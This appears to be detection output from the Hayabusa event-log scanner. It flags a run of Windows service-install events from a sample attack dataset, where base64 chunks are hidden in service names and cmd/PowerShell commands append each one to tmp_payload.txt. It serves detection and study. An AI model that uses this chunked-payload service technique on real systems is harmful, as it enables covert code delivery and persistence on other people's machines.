2021-11-03 17:19:58.655 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: QgU3lzdGVtLkRyYXdpbmcuU2l6ZSgxMDAsMTApDQogICAgICAgICREcm9wRG93bi5TaXplID0gbmV3LW9iamVjdCBTeXN0ZW0uRHJhd2luZy5TaXplKDEzMCwzMCkNCg0KICAgICAgICBGb3JFYWNo | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg196"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:58.655 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: QgU3lzdGVtLkRyYXdpbmcuU2l6ZSgxMDAsMTApDQogICAgICAgICREcm9wRG93bi5TaXplID0gbmV3LW9iamVjdCBTeXN0ZW0uRHJhd2luZy5TaXplKDEzMCwzMCkNCg0KICAgICAgICBGb3JFYWNo | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg196"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:00.108 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ICgkSXRlbSBpbiAkRHJvcERvd25PcHRpb25zKSB7DQogICAgICAgICBbdm9pZF0gJERyb3BEb3duLkl0ZW1zLkFkZCgkSXRlbSkNCiAgICAgICAgfQ0KDQogICAgICAgICRGb3JtLkNvbnRyb2xzLk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg197"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:00.108 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICgkSXRlbSBpbiAkRHJvcERvd25PcHRpb25zKSB7DQogICAgICAgICBbdm9pZF0gJERyb3BEb3duLkl0ZW1zLkFkZCgkSXRlbSkNCiAgICAgICAgfQ0KDQogICAgICAgICRGb3JtLkNvbnRyb2xzLk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg197"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:00.108 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICgkSXRlbSBpbiAkRHJvcERvd25PcHRpb25zKSB7DQogICAgICAgICBbdm9pZF0gJERyb3BEb3duLkl0ZW1zLkFkZCgkSXRlbSkNCiAgICAgICAgfQ0KDQogICAgICAgICRGb3JtLkNvbnRyb2xzLk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg197"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:01.550 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: FkZCgkRHJvcERvd24pDQoNCiAgICAgICAgJERyb3BEb3duTGFiZWwgPSBuZXctb2JqZWN0IFN5c3RlbS5XaW5kb3dzLkZvcm1zLkxhYmVsDQogICAgICAgICREcm9wRG93bkxhYmVsLkxvY2F0aW9u | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg198"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:01.550 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: FkZCgkRHJvcERvd24pDQoNCiAgICAgICAgJERyb3BEb3duTGFiZWwgPSBuZXctb2JqZWN0IFN5c3RlbS5XaW5kb3dzLkZvcm1zLkxhYmVsDQogICAgICAgICREcm9wRG93bkxhYmVsLkxvY2F0aW9u | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg198"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:01.550 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: FkZCgkRHJvcERvd24pDQoNCiAgICAgICAgJERyb3BEb3duTGFiZWwgPSBuZXctb2JqZWN0IFN5c3RlbS5XaW5kb3dzLkZvcm1zLkxhYmVsDQogICAgICAgICREcm9wRG93bkxhYmVsLkxvY2F0aW9u | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg198"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:03.020 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ID0gbmV3LW9iamVjdCBTeXN0ZW0uRHJhd2luZy5TaXplKDEwLDEwKSANCiAgICAgICAgJERyb3BEb3duTGFiZWwuc2l6ZSA9IG5ldy1vYmplY3QgU3lzdGVtLkRyYXdpbmcuU2l6ZSgxMDAsMjApIA | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg199"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:03.020 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ID0gbmV3LW9iamVjdCBTeXN0ZW0uRHJhd2luZy5TaXplKDEwLDEwKSANCiAgICAgICAgJERyb3BEb3duTGFiZWwuc2l6ZSA9IG5ldy1vYmplY3QgU3lzdGVtLkRyYXdpbmcuU2l6ZSgxMDAsMjApIA | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg199"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:03.020 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ID0gbmV3LW9iamVjdCBTeXN0ZW0uRHJhd2luZy5TaXplKDEwLDEwKSANCiAgICAgICAgJERyb3BEb3duTGFiZWwuc2l6ZSA9IG5ldy1vYmplY3QgU3lzdGVtLkRyYXdpbmcuU2l6ZSgxMDAsMjApIA | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg199"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:04.472 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 0KICAgICAgICAkRHJvcERvd25MYWJlbC5UZXh0ID0gIk9wdGlvbnM6Ig0KICAgICAgICAkRm9ybS5Db250cm9scy5BZGQoJERyb3BEb3duTGFiZWwpDQoNCiAgICAgICAgJEJ1dHRvbiA9IG5ldy1v | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg200"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:04.472 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 0KICAgICAgICAkRHJvcERvd25MYWJlbC5UZXh0ID0gIk9wdGlvbnM6Ig0KICAgICAgICAkRm9ybS5Db250cm9scy5BZGQoJERyb3BEb3duTGFiZWwpDQoNCiAgICAgICAgJEJ1dHRvbiA9IG5ldy1v | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg200"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:04.472 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 0KICAgICAgICAkRHJvcERvd25MYWJlbC5UZXh0ID0gIk9wdGlvbnM6Ig0KICAgICAgICAkRm9ybS5Db250cm9scy5BZGQoJERyb3BEb3duTGFiZWwpDQoNCiAgICAgICAgJEJ1dHRvbiA9IG5ldy1v | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg200"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:05.916 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: YmplY3QgU3lzdGVtLldpbmRvd3MuRm9ybXMuQnV0dG9uDQogICAgICAgICRCdXR0b24uTG9jYXRpb24gPSBuZXctb2JqZWN0IFN5c3RlbS5EcmF3aW5nLlNpemUoMTAwLDUwKQ0KICAgICAgICAkQn | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg201"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:05.916 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: YmplY3QgU3lzdGVtLldpbmRvd3MuRm9ybXMuQnV0dG9uDQogICAgICAgICRCdXR0b24uTG9jYXRpb24gPSBuZXctb2JqZWN0IFN5c3RlbS5EcmF3aW5nLlNpemUoMTAwLDUwKQ0KICAgICAgICAkQn | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg201"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:05.916 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: YmplY3QgU3lzdGVtLldpbmRvd3MuRm9ybXMuQnV0dG9uDQogICAgICAgICRCdXR0b24uTG9jYXRpb24gPSBuZXctb2JqZWN0IFN5c3RlbS5EcmF3aW5nLlNpemUoMTAwLDUwKQ0KICAgICAgICAkQn | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg201"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:07.360 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: V0dG9uLlNpemUgPSBuZXctb2JqZWN0IFN5c3RlbS5EcmF3aW5nLlNpemUoMTAwLDIwKQ0KICAgICAgICAkQnV0dG9uLlRleHQgPSAiU3VibWl0Ig0KICAgICAgICAkQnV0dG9uLkFkZF9DbGljayh7 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg202"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:07.360 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: V0dG9uLlNpemUgPSBuZXctb2JqZWN0IFN5c3RlbS5EcmF3aW5nLlNpemUoMTAwLDIwKQ0KICAgICAgICAkQnV0dG9uLlRleHQgPSAiU3VibWl0Ig0KICAgICAgICAkQnV0dG9uLkFkZF9DbGljayh7 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg202"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:07.360 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: V0dG9uLlNpemUgPSBuZXctb2JqZWN0IFN5c3RlbS5EcmF3aW5nLlNpemUoMTAwLDIwKQ0KICAgICAgICAkQnV0dG9uLlRleHQgPSAiU3VibWl0Ig0KICAgICAgICAkQnV0dG9uLkFkZF9DbGljayh7 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg202"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:08.810 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: UmV0dXJuLURyb3BEb3dufSkNCiAgICAgICAgJGZvcm0uQ29udHJvbHMuQWRkKCRCdXR0b24pDQoNCiAgICAgICAgJERyb3BEb3duLlNlbGVjdGVkSW5kZXggPSAgMA0KICAgICAgICANCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg203"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:08.810 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: UmV0dXJuLURyb3BEb3dufSkNCiAgICAgICAgJGZvcm0uQ29udHJvbHMuQWRkKCRCdXR0b24pDQoNCiAgICAgICAgJERyb3BEb3duLlNlbGVjdGVkSW5kZXggPSAgMA0KICAgICAgICANCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg203"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:08.810 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: UmV0dXJuLURyb3BEb3dufSkNCiAgICAgICAgJGZvcm0uQ29udHJvbHMuQWRkKCRCdXR0b24pDQoNCiAgICAgICAgJERyb3BEb3duLlNlbGVjdGVkSW5kZXggPSAgMA0KICAgICAgICANCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg203"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:10.268 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: AgJEZvcm0uQWRkX1Nob3duKHskRm9ybS5BY3RpdmF0ZSgpfSkNCiAgICAgICAgW3ZvaWRdICRGb3JtLlNob3dEaWFsb2coKQ0KDQogICAgICAgICRDaG9pY2UNCiAgICAgfQ0KICAgICANCiAgICBj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg204"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:10.268 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgJEZvcm0uQWRkX1Nob3duKHskRm9ybS5BY3RpdmF0ZSgpfSkNCiAgICAgICAgW3ZvaWRdICRGb3JtLlNob3dEaWFsb2coKQ0KDQogICAgICAgICRDaG9pY2UNCiAgICAgfQ0KICAgICANCiAgICBj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg204"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:10.268 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgJEZvcm0uQWRkX1Nob3duKHskRm9ybS5BY3RpdmF0ZSgpfSkNCiAgICAgICAgW3ZvaWRdICRGb3JtLlNob3dEaWFsb2coKQ0KDQogICAgICAgICRDaG9pY2UNCiAgICAgfQ0KICAgICANCiAgICBj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg204"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:11.713 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: YXRjaCB7DQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSB0byBnZW5lcmF0ZSBpbnB1dCBkcm9wIGRvd24iDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgJEVycm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg205"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:11.713 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: YXRjaCB7DQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSB0byBnZW5lcmF0ZSBpbnB1dCBkcm9wIGRvd24iDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgJEVycm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg205"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:11.713 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: YXRjaCB7DQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSB0byBnZW5lcmF0ZSBpbnB1dCBkcm9wIGRvd24iDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgJEVycm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg205"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:13.158 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 9yWzBdDQoNCiAgICAgICAgJEVycm9yTGluZU51bWJlciA9ICRFcnJvclswXS5JbnZvY2F0aW9uSW5mby5zY3JpcHRsaW5lbnVtYmVyDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIkNh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg206"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:13.158 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 9yWzBdDQoNCiAgICAgICAgJEVycm9yTGluZU51bWJlciA9ICRFcnJvclswXS5JbnZvY2F0aW9uSW5mby5zY3JpcHRsaW5lbnVtYmVyDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIkNh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg206"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:13.158 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 9yWzBdDQoNCiAgICAgICAgJEVycm9yTGluZU51bWJlciA9ICRFcnJvclswXS5JbnZvY2F0aW9uSW5mby5zY3JpcHRsaW5lbnVtYmVyDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIkNh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg206"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:14.614 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: dWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICBleGl0DQoNCiAgICB9DQp9DQoNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg207"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:14.614 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: dWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICBleGl0DQoNCiAgICB9DQp9DQoNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg207"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:14.614 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: dWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICBleGl0DQoNCiAgICB9DQp9DQoNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg207"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:16.115 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIGdldCB0aGUgbGlzdCBvZiBjb21wdXRlcnMgYmFzZWQgb24gdGhlIHVzZXJzIHNl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg208"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
